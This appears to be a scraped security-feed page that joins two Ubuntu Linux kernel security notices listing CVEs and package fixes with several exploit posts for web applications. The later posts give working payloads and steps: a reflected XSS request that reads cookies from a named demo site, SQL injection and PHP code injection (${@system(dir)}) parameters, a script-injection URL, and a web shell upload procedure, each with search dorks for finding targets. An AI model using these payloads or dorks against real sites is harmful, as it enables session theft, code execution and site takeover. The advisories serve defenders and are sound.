Tavis Ormandy discovered that some AMD processors did not properly handle  
speculative execution of certain vector register instructions. A local  
attacker could use this to expose sensitive information. (CVE-2023-20593)

It was discovered that the universal 32bit network packet classifier  
implementation in the Linux kernel did not properly perform reference  
counting in some situations, leading to a use-after-free vulnerability. A  
local attacker could use this to cause a denial of service (system crash)  
or possibly execute arbitrary code. (CVE-2023-3609)

It was discovered that the Quick Fair Queueing network scheduler  
implementation in the Linux kernel contained an out-of-bounds write  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2023-3611)

It was discovered that the network packet classifier with  
netfilter/firewall marks implementation in the Linux kernel did not  
properly handle reference counting, leading to a use-after-free  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2023-3776)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 20.04 LTS:  
   linux-image-5.4.0-1075-gkeop    5.4.0-1075.79  
   linux-image-gkeop               5.4.0.1075.73  
   linux-image-gkeop-5.4           5.4.0.1075.73

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6324-1  
   CVE-2022-40982, CVE-2023-20593, CVE-2023-3609, CVE-2023-3611,  
   CVE-2023-3776

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-gkeop/5.4.0-1075.79

Ubuntu Security Notice USN-6324-1

Ubuntu Security Notice 6321-1 - Daniel Moghimi discovered that some Intel Processors did not properly clear microarchitectural state after speculative execution of various instructions. A local unprivileged user could use this to obtain to sensitive information. Tavis Ormandy discovered that some AMD processors did not properly handle speculative execution of certain vector register instructions. A local attacker could use this to expose sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6321-1  
August 30, 2023

linux-gcp, linux-starfive vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems  
- linux-starfive: Linux kernel for StarFive processors

Details:

Daniel Moghimi discovered that some Intel(R) Processors did not properly  
clear microarchitectural state after speculative execution of various  
instructions. A local unprivileged user could use this to obtain to  
sensitive information. (CVE-2022-40982)

Tavis Ormandy discovered that some AMD processors did not properly handle  
speculative execution of certain vector register instructions. A local  
attacker could use this to expose sensitive information. (CVE-2023-20593)

It was discovered that the universal 32bit network packet classifier  
implementation in the Linux kernel did not properly perform reference  
counting in some situations, leading to a use-after-free vulnerability. A  
local attacker could use this to cause a denial of service (system crash)  
or possibly execute arbitrary code. (CVE-2023-3609)

It was discovered that the netfilter subsystem in the Linux kernel did not  
properly handle certain error conditions, leading to a use-after-free  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2023-3610)

It was discovered that the Quick Fair Queueing network scheduler  
implementation in the Linux kernel contained an out-of-bounds write  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2023-3611)

It was discovered that the network packet classifier with  
netfilter/firewall marks implementation in the Linux kernel did not  
properly handle reference counting, leading to a use-after-free  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2023-3776)

Kevin Rich discovered that the netfilter subsystem in the Linux kernel did  
not properly handle table rules flush in certain circumstances. A local  
attacker could possibly use this to cause a denial of service (system  
crash) or execute arbitrary code. (CVE-2023-3777)

Kevin Rich discovered that the netfilter subsystem in the Linux kernel did  
not properly handle rule additions to bound chains in certain  
circumstances. A local attacker could possibly use this to cause a denial  
of service (system crash) or execute arbitrary code. (CVE-2023-3995)

It was discovered that the netfilter subsystem in the Linux kernel did not  
properly handle PIPAPO element removal, leading to a use-after-free  
vulnerability. A local attacker could possibly use this to cause a denial  
of service (system crash) or execute arbitrary code. (CVE-2023-4004)

Kevin Rich discovered that the netfilter subsystem in the Linux kernel did  
not properly handle bound chain deactivation in certain circumstances. A  
local attacker could possibly use this to cause a denial of service (system  
crash) or execute arbitrary code. (CVE-2023-4015)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
   linux-image-6.2.0-1003-starfive  6.2.0-1003.3  
   linux-image-6.2.0-1012-gcp      6.2.0-1012.12  
   linux-image-gcp                 6.2.0.1012.12  
   linux-image-starfive            6.2.0.1003.6

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6321-1  
   CVE-2022-40982, CVE-2023-20593, CVE-2023-3609, CVE-2023-3610,  
   CVE-2023-3611, CVE-2023-3776, CVE-2023-3777, CVE-2023-3995,  
   CVE-2023-4004, CVE-2023-4015

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-gcp/6.2.0-1012.12  
   https://launchpad.net/ubuntu/+source/linux-starfive/6.2.0-1003.3

Ubuntu Security Notice USN-6321-1

PHP JABBERS PHP Review Script version 1.0 suffers from a cross site scripting vulnerability.

    ## Title: PHPJABBERS-PHP Review Script-1.0 XSS-Reflected## Author: nu11secur1ty## Date: 08/31/2023## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/php-review-script/## Reference: https://portswigger.net/web-security/cross-site-scripting/reflected## Description:The value of the `action` request parameter is copied into the HTMLdocument as plain text between tags. The payload aelll<img src=aonerror=alert(1)>nx0ib was submitted in the action parameter. Thisinput was echoed unmodified in the application's response. Theattacker can steal a PHPSESSID cookie!STATUS: HIGH Vulnerability[+]Exploit:```GETGET /1693484209_401/hipark-residence.php?controller=pjLoad&action=pjActionPostaelll%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3enx0ibHTTP/1.1Host: demo.phpjabbers.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111Safari/537.36Connection: closeCache-Control: max-age=0Cookie: _ga=GA1.2.221094441.1693486538;_gid=GA1.2.1044601458.1693486538; _gat=1;_fbp=fb.1.1693486538348.177361623;_ga_NME5VTTGTT=GS1.2.1693486538.1.1.1693486541.57.0.0Upgrade-Insecure-Requests: 1Referer: http://demo.phpjabbers.com/1693484209_401/hipark-residence.php?controller=pjLoad&action=pjActionIndex&pjPage=1Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 0```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/PHP-Review-Script-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/08/phpjabbers-php-review-script-10-xss.html)## Time spend:01:05:00

PHP JABBERS PHP Review Script 1.0 Cross Site Scripting

Innovins CMS version 4.7 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : Innovins CMS v4.7 Sql Injection Vulnerability                                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://www.innovins.com/                                                                                          || # Dork      : intext:Developed by - Innovins                                                                                     |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : events2.php?id= [+] http://www.127.0.0.1saingoorg/events2.php?id= <===== inject herGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Innovins CMS 4.7 SQL Injection

Islam CMS version 1.0 suffers from a remote PHP code injection vulnerability.

    ====================================================================================================================================| # Title     : islam cms v1.0 PHP code injection Vulnerability                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://almohtaref.net/                                                                                            || # Dork      : R.I.P                                                                                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This vulnerability affects /islamcms/index.php [+] In the search box use payload :     http://127.0.0.1/islamcms/index.php?name=search    ${@system(dir)}    ${@print inoushka}    word=%24%7b%40print indoushka}%7dGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Islam CMS 1.0 Code Injection

Invasor Diagonal CMS version 1.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Invasor Diagonal CMS 1.0 XSS Vulnerability                                                                         || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://invasordiagonal.com                                                                                        |  | # Dork      : intext:''web development // invasor diagonal''                                                                     |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : /eventos.php?id=%3Cscript%3Ealert(/indoushka/);%3C/script%3E[+]  http://target_site/eventos.php?id=%3Cscript%3Ealert(/indoushka/);%3C/script%3EGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

Invasor Diagonal CMS 1.0 Cross Site Scripting

InterPhoto version 2.3.0 suffers from a remote shell upload vulnerability.

    ====================================================================================================================================| # Title     : InterPhoto 2.3.0 Persians Remote Shell Upload vulnerability                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : http://www.dl.persianscript.ir/script/InterPhoto_2.3.0_Persians(PersianScript.ir).zip                              || # Dork      : InterPhoto 2.3.0                                    '                                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Register an Account : http://site/register.php  [+] Upload the shell.php instead of your photo (shell.php.jpg) : http://site/mydesk.upload.php[+] so rename shell.php.jpg to shell.php by Live HTTP Headers.(Mozilla FireFox Add-ons)  [+] Locate the shell in this route : http://site/MyWebsiteImages/XX/original/YY.php  [+] XX=Name of This Folder Like This Pattern : Year_Month_RandomChar(Sample : 2012_10_oZUGCD7IP81I)  [+] YY=Name of Shell.(Renamed to Random Char)Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Tag

#google